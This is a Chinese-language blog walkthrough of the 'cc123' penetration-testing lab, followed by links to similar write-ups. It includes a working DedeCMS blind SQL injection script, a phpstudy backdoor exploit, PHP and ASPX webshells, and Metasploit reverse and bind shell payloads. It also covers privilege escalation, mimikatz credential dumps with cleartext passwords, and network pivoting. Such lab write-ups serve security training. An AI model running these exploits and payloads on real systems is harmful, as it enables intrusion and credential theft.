代码编织梦想

1.cc123 靶场介绍

本靶场存在四个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。

1.1.网络示意图

ca02ecf9757b46450a86902b3b79c992.png

2. 信息收集

2.1.主机发现

sudo netdiscover -i eth0 -r 192.168.0.0/24
3c0dffd649553b1e9a3b21ee61f5d472.png

2.2.masscan 端口扫描

sudo masscan -p 1-65535 192.168.1.102 --rate=1000
957b290068eca7e08a151571a48f4d2a.png

2.3.nmap 端口信息探测

nmap -sC -A 192.168.0.134 -p 80,53,49154,6588,3389,135,21,51464,999 -oA cc123-port
4872f1d4250d4b378ea63e3fbbe6a51d.png

2.4.网站信息

http://192.168.1.102:6588/

89bef8029f51261e6694f037a88c8097.png

http://192.168.1.102:999/

8abfffb903ce2ec15bebaee4fb6935b2.png

http://192.168.1.102/

9cb26ed26a4cc308f6b32ea199184f8b.png

3. 本地设置

3.1.绑定本地 hosts

C:\Windows\System32\drivers\etc\hosts
192.168.1.102 www.cc123.com
2baa08ee7dac2761c997317049b0aab6.png

sudo vim /etc/resolv.conf
ad73264e2271dfaf2767fb086c467f45.png

4. 子域名搜集

4.1.wfuzz 穷举子域名

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
f387fbf831f2c8b42fb0403c8c76b0bc.png

5.子域名信息

dedecms new.cc123.com

KesionEDU www.cc123.com

net ww2.cc123.com

6. 漏洞测试

6.1.dedecms 安全检测

经测试发现会员系统开放 http://new.cc123.com/member/

注册会员后,

dedecms 的版本是 20150618 存在注入。

http://www.hekaiyu.cn/hacker/3060.html

利用如下注入脚本,python2

import sys,os
import urllib2
import time
opener = urllib2.build_opener()

def getCookes():
    line = open('cookies.txt','r')
    c = line.readline()
    line.close()
    return c

cookie=getCookes()
opener.addheaders.append(('Cookie',cookie))
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

def exploite(target):
    password = ""
    for i in range(1,21):
        for p in payloads:
            s1 = "%s" %(i)
            s2 = "%s" %(ord(p))
            s = target+"/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a'%20and%20`'`.``.mtypeid%20or%20if(ascii(substr((select%20pwd%20from%20dede_admin%20limit%201),"+s1+",1))%3d"+s2+",sleep(4),0)%20and%20mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx"
            start_time = time.time()
            try:
                req = urllib2.Request(s)
                req_data=opener.open(req,timeout=10)
                now = time.strftime('%H:%M:%S',time.localtime(time.time()))
                if time.time() - start_time > 4.0:
                    password = password+p
                    print "["+str(now)+"]: "+s1+" -> "+password
            except urllib2.URLError,e:
                print e;
    return password






def myhelp():
    print "\n+------------------------------+"
    print "|  Dedecms 20150618 member sqli|"
    print "|  mOon  www.moonsec.com       |"
    print "|  MTEAM:moon@moonsec.com      |"
    print "+------------------------------+\n"

def main():
    if len(sys.argv)< 2:
        myhelp()
        sys.exit()
    now = time.strftime('%H:%M:%S',time.localtime(time.time()))
    print "["+str(now)+"] [INFO] Dedecms 20150618 member sqli.."
    print "password is %s" % (exploite(sys.argv[1]))

if __name__ == '__main__':
    main()

密文 812df726be884ddcfc41 解密:admin7788

后台上传 http://new.cc123.com/dede/ 文件管理器上传一句话

中国蚁剑链接

b7ea0ee4502ef8e4b4c7ca9027ea37f7.png

7. 提权服务器

在终端执行命令失败

上传 ASPXSpy2014 http://new.cc123.com/a/ASPXSpy2014.aspx

8d27dbd4d204796e74eb88076cc5c66a.png

7.1.metasploit windows 提权

生成攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.53 lport=12345 -f
exe >s.exe
metasplosit 监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.53
lhost => 192.168.0.109
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit
3c43749f6be915251f984154c07e8325.png

7.2.扫描可写目录

1a3d3a6564934580aca39b6557d1f610.png

7.3.得到 meterpreter

7.4.检测能提权的漏洞

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1

7.5. ms16_075 提权

msf5 post(multi/recon/local_exploit_suggester) > use
exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > set SESSION 1
msf5 exploit(windows/local/ms16_075_reflection_juicy) > exploit
449c93c42cd9157cdb9242b4fd18f00b.png

8. 得到 flag

8.1.第一个 flag

b695aaffc4ab8f4012ace6eba9d1189a.png

8.2.第二个 flag

50eee0b8fe7fed771533c93c2e0a713d.png

9. 测试 ww2.cc123.com 安全

9.1.gobuster 目录扫描

gobuster dir -u http://ww2.cc123.com -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html" -o ww2dir
3b4339b1c596f68ff3379ffec2bb595a.png

http://ww2.cc123.com/admin/Login.aspx后台

http://ww2.cc123.com/editor 编辑器

经测试后台的密码是 cc123

9.2.SQLMAP 测试注入

后台某个页面编抓包

GET /admin/aboutadd.aspx?id=7&pid=6 HTTP/1.1
Host: ww2.cc123.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=2xovfhwbalj2aklbztyyqklq; The Cool Site=lao=27; CheckCode=T0R6
Connection: close
└─$ sqlmap -r 1.txt --dbms="mssql" --batch -v 1                                          

sqlmap测试注入

5227c509c0ad706ef1f96cc2725200e4.png

列出库

9b9455ccc206ed7c2e7f37e3318f8100.png

获取 mssql shell

dce773e0d5f83d9b881fa0d376e04963.png

9.3.SQLSERVER 服务器信息整理

hostname 获取服务器名

WIN-JJU7KU45PN7

网卡信息


   IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
 
以太网适配器 本地连接:
 
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954

9.4.第三个 flag

type C:\Users\Administrator\root.txt.txt
eacdab9b6aaa8153bf1e579ac1c465a1.png

9.5..net 代码审计

c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\bin>dir
9df6e92ff26064e458e15d92487810af.png

下载文件

download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin
2442f5971b424b61342dce757fb5b5fc.png

9.5.1.反编译 dll

IL Spy 导入你要反编译的 dll

10.多重网段内网渗透

10.1. WEB 服务器信息收集

10.1.1. 网卡信息

ipconfig

b0ade209aabc3699274aec56b413a979.png

存在两个ip,192.168.1.102 10.10.10.135

10.1.2. 路由信息

meterpreter > run get_local_subnets
62db237ce6938254974b639faaec1843.png

存在两个网段

10.10.10.0/255.255.255.0

192.168.1.0/255.255.255.0

10.1.3. 哈希获取

meterpreter > run hashdump
报错
migrate 2396
尝试使用模块
run post/windows/gather/smart_hashdump
f28313ec53c3210d823b339f16976a9a.png

[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
[+]     MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
[+]     PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
[+]     huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
[+]     cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
[+]     newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
[+]     ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::

10.1.4. 使用 mimikatz 获取明文

creds_all
creds_tspkg
lsa_dump_secrets
kiwi_cmd sekurlsa::logonpasswords
d3fe9a55fb13ed9e6dca74e49fe0cfc0.png

WIN-KALKEMT3JMA Administrator !@#Qwe123.
WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
WIN-KALKEMT3JMA ww2cc123 xwSggtdWvl42JGHivMX

10.1.5. 添加路由进行内网渗透

meterpreter > run autoroute -s 10.10.10.0/24
108be187e743829fbd8ad1cea07c096d.png

10.1.6. 启动 socks 代理

use auxiliary/server/socks_proxy

10.1.7. 使用 proxychains 配置文件

配置修改配置文件 sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080

10.1.8. 使用 proxychains 调用nmap 扫描

0f85330656cdab9c90e473e0bf0a140f.png

10.2. 数据库服务器信息收集

10.2.1. 网卡端口信息

os-shell 执行 netstat -ano 查看端口信息

 TCP    10.10.10.136:1433      10.10.10.135:53586     ESTABLISHED     1152
  TCP    10.10.10.136:1433      10.10.10.135:53587     ESTABLISHED     1152
  TCP    10.10.10.136:1433      10.10.10.135:53588     ESTABLISHED     1152
  TCP    10.10.10.136:1433      10.10.10.135:53589     ESTABLISHED     1152
  TCP    10.10.10.136:1433      10.10.10.135:53590     ESTABLISHED     1152
  TCP    10.10.10.136:1433      10.10.10.135:53591     ESTABLISHED     1152
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       1152
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       692
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1433              [::]:0                 LISTENING       1152
  TCP    [::]:2383              [::]:0                 LISTENING       1180
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       368
  TCP    [::]:49153             [::]:0                 LISTENING       740
  TCP    [::]:49154             [::]:0                 LISTENING       836
  TCP    [::]:49155             [::]:0                 LISTENING       484
  TCP    [::]:49160             [::]:0                 LISTENING       476
  TCP    [::]:49161             [::]:0                 LISTENING       1928
  TCP    [::1]:1434             [::]:0                 LISTENING       1152
  UDP    0.0.0.0:123            *:*                                    920
  UDP    0.0.0.0:500            *:*                                    836
  UDP    0.0.0.0:4500           *:*                                    836
  UDP    0.0.0.0:5355           *:*                                    1004
  UDP    10.10.1.128:137        *:*                                    4
  UDP    10.10.1.128:138        *:*                                    4
  UDP    10.10.10.136:137       *:*                                    4
  UDP    10.10.10.136:138       *:*                                    4
  UDP    127.0.0.1:49532        *:*                                    2064
  UDP    [::]:123               *:*                                    920
  UDP    [::]:500               *:*                                    836
  UDP    [::]:4500              *:*                                    836
  UDP    [::]:5355              *:*                                    1004
---

网卡信息

网适配器 本地连接 2:
 
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::70bc:cf3:8c1c:737e▒
   IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
 
以太网适配器 本地连接:
 
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954

10.2.2. 生成正向连接载荷

msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 10.10.10.136
set lport 13777
8b692f21060e4e72db85269d1e5a754c.png

10.2.3. mssql 上传文件

e5b80fa2f00265359bd8897b21434634.png

10.2.4. 执行文件并且获取 session

使用正向连接监听
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 10.10.10.134
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > run
a5ea6e7fbc10ad2f4228701ccf9f9262.png

10.2.5. 迁移进程

2b93e1b3d82f88256746ed5c69bdbfa5.png

10.2.6. 加载 mimikatz 获取明文

875a2214f42d1ea08314f8c254004f9e.png

获取明文 Administrator !@#QWEasd123.

10.3. 渗透目标服务器

10.3.1. 添加路由

目标机子在 10.10.1.0 段

run autoroute -s 10.10.1.0/24

ed83c2e1ac1f7e34dac1dfa24836209c.png

10.3.2. 探测端口

3f076ba7585eaa10028ac8e2a5ab7602.png

10.3.3. phpstudy 后门测试

└─$ proxychains4 firefox 10.10.1.129                                                     

访问 80 端口发现是 phpstudy

42093fcb9edd90d324c1380c9c747d70.png

10.3.4. python 编写 phpstudy 后门exp

#conding:utf-8

import requests
import sys
import base64

shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))

header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}

def exploit(url):
    html = requests.get(url=url,headers=header).text
    return html

url = "http://10.10.1.129/"
print(exploit(url))
写入 shell
proxychains3 python3 phpstudy.py "echo ^<?php
@eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

10.3.5. SocksCap64 设置本机代理

要在 kali 的 /etc/proxychains.conf
把 127.0.0.1 改成 kali 的 ip 不然物理机代理会失败
61e74e04252d44160ed6c414cc644ad8.png

10.3.6. 获取目标机子的 session

将 bind.exe 上传到目标上执行 metasploist 正向连接目标

953312432f7ac07bbc531f5985f4220a.png

10.3.7. 最后一个 flag

d8ef8f461f1881be4ee7439cad3657b6.png

f070db013713b595e8d06176acfbcd87.jpeg

我希望兜兜转转之后那个人还是你

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/128750096

[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令-爱代码爱编程

这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册

2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)-爱代码爱编程

                                                                                                                     masscan扫描kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 -

安鸾复现笔记_One-爱代码爱编程

目录 0x00 前言 0x01 基础题 1、BurpSuite抓包 2、kali系统安装 0x02 暴力破解 1、ftp服务破解 2、telnet服务破解 3、Mysql暴力破解 4、登录表单破解 5、一句话密码破解 6、SSH离线破解 7、wordpress后台破解 0x03 后记 0x00 前言         很

网络安全学习笔记-爱代码爱编程

学习笔记 目录 文章目录 学习笔记目录@[toc]第一章 Web篇一、信息收集1. 搜索引擎常用语法2. 敏感目录泄露2.1 git泄露2.2 Subversion (SVN)泄露2.3 IDE项目文件泄露2.4 敏感备份文件3. 域名收集判断网站操作系统4. 信息收集复现二、SQL注入1. 手工注入注入的分类注入点(放置在查询参数前)注

实训笔记2.0-爱代码爱编程

3.22 CSRF漏洞介绍 CSRF (Cross--site request forgery,跨站请求伪造))也被称为 One Click Attack 或者 Session Riding,通常缩写为 CSRF 或者 XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF

CSF三层主机:渗透测试靶场笔记-爱代码爱编程

文章目录 环境搭建环境详细Target1Target2反弹shell信息收集配置代理Target3Flag 测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略 环境搭建 【CFS三层靶机环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsO

SQLI-LABS(1-4)通关笔记-爱代码爱编程

靶场环境 buuctf的靶场 来到第一关 根据提示:提交方式GET 有报错提示 闭合方式为单引号 源码的sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 使用?id=1传参 不要问我为啥这样写 我也不知道 依次使用?id=2,3,4,5,6.....不知道这关要干嘛QA

Vulntarget靶场渗透笔记[持续更新中]-爱代码爱编程

Vulntarget靶场渗透笔记 文章目录 Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a

网络安全笔记-爱代码爱编程

学习笔记 ”一以贯之的努力赢得不可懈怠的人生,这就是答案“ 目录 文章目录 学习笔记目录@[toc]第一章 Web篇一、信息收集1. 搜索引擎常用语法2. 敏感目录泄露2.1 git泄露2.2 Subversion (SVN)泄露2.3 IDE项目文件泄露2.4 敏感备份文件3. 域名收集判断网站操作系统4. 信息收集复现二、

完整的渗透测试练习_s1aine的博客-爱代码爱编程

完整的渗透测试实例 作者:Slaine 编辑日期:2021.6.6 前言 记得在2021年初就通关的这个的内网渗透靶场,只不过做完很久都后没怎么管,然后就去某CTF站刷了好一阵子题,排名从两万刷到了两百。 记得刷完CTF题后又是各种考试,过了好一阵子才有时间把这个内网渗透的笔记总结(2021.6.6)。 一年后的现在暑假(2022.7)开始了,整理

vulntarget漏洞靶场-vulntarget-b_amingmm的博客-爱代码爱编程

vulntarget-b 环境准备github地址:百度云相关漏洞技术网络拓扑图环境搭建过程centos7极致CMS域控2016域成员win10禅道网络配置centos7域成员win10域控win2016测试网络环境渗透端口扫描历史漏洞蚁剑连接 webshellmsf上线msf生成一个反向msf监听centos7提权先添加路由找可power模块回弹

dc-9靶场练习_玄德ь的博客-爱代码爱编程

Vulnhub靶场-DC-9 准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 下载链接:https://download.vulnhub.com/dc/DC-9.zip 一、主机发现 nmap扫描

vulnhub靶场渗透攻防实战_m0_67942524的博客-爱代码爱编程

day01 1. 主机发现(nmap的使用) 1)ip发现 nmap -sP 192.168.200.1/24 2)端口扫描 nmap -p 1-65535 -A 192.168.200.1

vsmoon靶场实战笔记-爱代码爱编程

vsmoon靶场实战笔记 web打点 信息收集 nmap扫描端口 扫描结果 └─$ nmap -sV -A 192.168.1.106 -Pn Starting Nmap 7.92 ( https://nmap.o

buuctf笔记(web)_buu web笔记-爱代码爱编程

一、[极客大挑战 2019]EasySQL1  进入后让我们登录网站, 尝试一下, 可以看到是get型,直接尝试绕过, ?username=admin' or '1'='1&password=123' or '1'='1  ' 是为了闭合原本sql语句从而构成万能语句的。 二、[HCTF 2018]WarmUp1  给了个